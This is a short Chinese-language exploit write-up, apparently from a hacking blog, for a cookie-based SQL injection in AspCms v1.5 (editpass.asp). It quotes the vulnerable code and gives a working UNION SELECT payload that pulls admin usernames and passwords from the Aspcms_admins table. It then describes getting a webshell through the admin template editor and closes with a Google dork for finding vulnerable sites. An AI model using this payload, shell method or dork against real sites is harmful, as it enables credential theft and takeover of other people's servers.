Author: Virushack
Blog: http://virushack.org
From:www.v5script.org
漏洞文件:editpass.asp
漏洞代码:
- Dim linkman , gender , phone , mobile , email , qq , address , postcode
- if isnul ( rCookie ( “loginstatus” )) then wCookie “loginstatus” , 0
- if rCookie ( “loginstatus” )= 1 then
- set rsObj = conn . Exec ( “select * from aspcms_Users where UserID=” & trim ( rCookie ( “userID” )), “r1″ )
- 直接通过rCookie 取得userid带入查询.
再看看 rcookie函数的处理
- ‘读cookies
- Function rCookie(cookieName)
- rCookie=request.cookies(cookieName)
- End Function
直接通过cookies取得
利用:
注册个帐号让 loginstatus不为空
然后 cookies注入 userID 不管你手注还是工具 都行 我这是用火狐的cookies插件
Exploit:UNION SELECT 1,2,3,4,5,6,username,adminpassword,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from Aspcms_admins
效果图:
后台拿shell 就更简单了 插一句话什么都行 我这就用最稳当的方法
http://127.0.0.1/admin/_Style/AspCms_TemplateEdit.asp?filename=a.asp
http://127.0.0.1/Templates/default/html/a.asp
Google Dork: Powered by AspCms v1.5